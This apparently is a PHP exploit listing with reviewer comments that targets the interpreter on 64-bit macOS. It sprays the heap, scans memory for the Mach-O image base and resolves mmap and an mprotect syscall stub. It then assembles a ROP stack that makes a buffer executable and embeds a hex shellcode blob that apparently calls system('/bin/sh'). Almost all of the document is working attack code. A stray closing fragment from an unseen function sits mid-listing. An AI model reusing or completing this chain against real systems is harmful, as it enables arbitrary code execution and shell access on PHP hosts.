// Locate the base of a loaded Mach-O image by scanning memory.
// Steps visible here: build a large array of filler arrays, read 0x10000 bytes at ptr(),
// search the hex dump for a fixed byte signature, pull an 8-byte little-endian value from
// a fixed offset after the match, then step backwards in 0x100-byte increments until an
// 8-byte block equal to "cffaedfe07000001" is found (this looks like the 64-bit Mach-O
// magic followed by a cputype field — not verified here).
// Returns the matching address, or FALSE when the signature or header is not found.
// NOTE(review): ptr(), map(), nogc() and swapEndianness() are defined elsewhere; their
// exact contracts (return shapes, what nogc() pins) are not visible in this listing.
function rop_findexec() {
    $x = [];
    $p = ptr() + 0;
    // Fill $x with 0x2000 identical 12-element arrays before the scan; the reason is not
    // stated in the listing (presumably memory layout shaping — confirm against the caller).
    for ($i = 0; $i < 0x2000; $i++) {
        array_push($x, [0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141]);
    }
    // map() appears to return an array whose element 0 holds the raw bytes read.
    $a = map($p, 0x10000)[0];
    nogc($a);
    // Work on the hex encoding from here on, so every offset below is in hex characters (2 per byte).
    $a = bin2hex($a);
    nogc($a);
    $r = strpos($a, "3100000000000000100000000f0000000c000000010000000c00000000000000");
    if ($r !== FALSE) {
        // 16 hex chars (8 bytes) located 0x80 hex chars (0x40 bytes) past the signature,
        // byte-swapped and parsed as an integer; "+ 0" forces a numeric value.
        $a = substr($a, $r + 0x80, 0x10);
        $a = hexdec(swapEndianness($a));
        $a = $a + 0;
        // Walk downwards from the 0x100-aligned address, one 0x100 step per iteration,
        // reading 8 bytes each time, until the expected header bytes appear.
        for ($i = 0; $i < 0x100000; $i++) {
            $k = map(($a & ~0xff) - 0x100 * $i, 0x8);
            if ("cffaedfe07000001" == bin2hex($k[0])) {
                return ($a & ~0xff) - 0x100 * $i + 0;
            }
        }
    }
    return FALSE;
}
// Tail of a function whose start is not in this listing.
return ibuf($x, 8); }

// --- top-level setup: resolve addresses and assemble a return-oriented stack ---
// NOTE(review): alloc(), getplt(), r32(), r64(), gadget(), findmhfromaddr(), ibuf() and
// w64() are defined elsewhere; what follows is read from their call sites only.
// alloc() appears to return an array with a 'ptr' key (used below as $all['ptr']).
$all = alloc(4096);
// Fixed machine-code payload, stored as raw bytes; not decoded or reviewed here.
$shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800");
// Image base found by scanning memory; the original single-line form put "//" comments
// before later statements, so the line breaks below restore the intended statement boundaries.
$addr = rop_findexec();
nogc($addr);
$dlsym = getplt($addr, "_dlsym"); // get plt entry
nogc($dlsym); // $dlsym is not used anywhere in this listing
$mmap_plt = getplt($addr, "_mmap"); // get plt entry
// Follow the PLT stub: a 32-bit displacement at +2, relative to the end of a 6-byte instruction,
// then dereference the resulting 64-bit slot (inferred from the arithmetic — confirm).
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6);
nogc($mmap);
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002"); // find b84a000002 movl $0x200004a, %eax -> mprotect syscall
nogc($mprotect);

// Look up a byte pattern in image $a and return its address as an 8-byte buffer.
function ig($a, $b) {
    return ibuf(gadget($a, $b), 8);
}

// Three short gadgets located by byte pattern (two in the main image, one next to mmap).
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
// Stack layout, in order: gadget, page-aligned buffer pointer, gadget, 2*4096, gadget, 7,
// $mprotect address, then the unaligned buffer pointer. Continues past this listing.
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);
$stack .= $arg2;
$stack .= w64(4096 * 2);
$stack .= $arg3;
$stack .= w64(7);
$stack .= w64($mprotect);
$stack .= w64($all['ptr']);
// Read $sz bytes starting at $addr, one chunk per readpage() call, returning them as a string.
// readpage() is defined elsewhere; from its use here it returns an array whose element 0 is
// indexable by the low 24 bits of the address plus a byte offset.
// NOTE(review): $page is computed but never used; $sz is reduced by 0x1000 per iteration
// while $addr advances by $rsz, so the two counters only agree when $rsz == 0x1000 — the
// intended chunk size is not clear from this listing.
function read($addr, $sz) {
    $ret = "";
    $page = $addr & ~0xffffff;
    while ($sz > 0) {
        // Chunk length: remaining size, capped at 16 MiB (0xffffff + 1).
        $rsz = min($sz, 0xffffff + 1);
        $pg = readpage($addr);
        // Byte-by-byte copy from the chunk, offset by the low 24 bits of $addr.
        for ($i = 0; $i < $rsz; $i++) {
            $ret .= $pg[0][($addr & 0xffffff) + $i];
        }
        $addr += $rsz;
        $sz -= 0x1000;
    }
    nogc($ret);
    return $ret;
}